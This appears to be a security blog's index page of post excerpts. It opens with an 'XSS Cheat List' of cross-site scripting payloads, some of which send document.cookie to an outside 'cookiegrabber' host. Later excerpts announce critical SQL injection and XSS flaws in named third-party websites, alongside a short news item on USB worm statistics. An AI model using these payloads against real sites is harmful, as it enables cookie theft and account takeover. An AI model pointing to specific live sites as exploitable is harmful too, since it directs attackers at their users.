XSS Cheat List
<script>alert(1);</script> <script>alert(‘XSS’);</script> <script src=”http://www.evilsite.org/cookiegrabber.php”></script> <script>location.href=”http://www.evilsite.org/cookiegrabber.php?cookie=”+escape(document.cookie)</script> <scr<script>ipt>alert(‘XSS’);</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port’\ja\vasc\ript:alert(“XSS”)’;</style> <? echo(‘<scr)’; echo(‘ipt>alert(“XSS”)</script>’); ?> <marquee><script>alert(‘XSS’)</script></marquee> <IMG SRC=”jav	ascript:alert(‘XSS’);”> <IMG SRC=”jav
ascript:alert(‘XSS’);”> <IMG SRC=”jav
ascript:alert(‘XSS’);”> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> “><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG LOWSRC=”javascript:alert(‘XSS’)”> <IMG DYNSRC=”javascript:alert(‘XSS’)”> <font style=’color:expression(alert(document.cookie))’> ‘); alert(‘XSS <img src=”javascript:alert(‘XSS’)”> <script language=”JavaScript”>alert(‘XSS’)</script> [url=javascript:alert('XSS');]click me[/url] <body onunload=”javascript:alert(‘XSS’);”> <body onLoad=”alert(‘XSS’);” [color=red' onmouseover="alert('xss')"]mouse over[/color] “/></a></><img src=1.gif onerror=alert(1)> window.alert(“Bonjour [...]
Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal
Security Researcher $@T0R! reported another Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user [...]
Critical SQL Injection in singforyou.net
Security Researcher $@T0R! has reported another Critical SQL Injection in singforyou.net SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is [...]
25 per cent of new worms designed to spread via USB
48 per cent of SMBs are infected by worms each year according to a report published by security vendor PandaLabs. The Second International SMB Security Barometer report (PDF here) surveyed 10,470 companies across Europe, Latin America and North America and found that a third of attacks came from malware capable of spreading via USB. According [...]
Critical XSS Vulnerability in Thanyawzin – Myanmar Online Friends Community http://www.thanyawzin.com/
PlanetCreator has reported another Critical XSS Vulnerability in Thanyawzin – Myanmar Online Friends Community http://www.thanyawzin.com/ Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers [...]
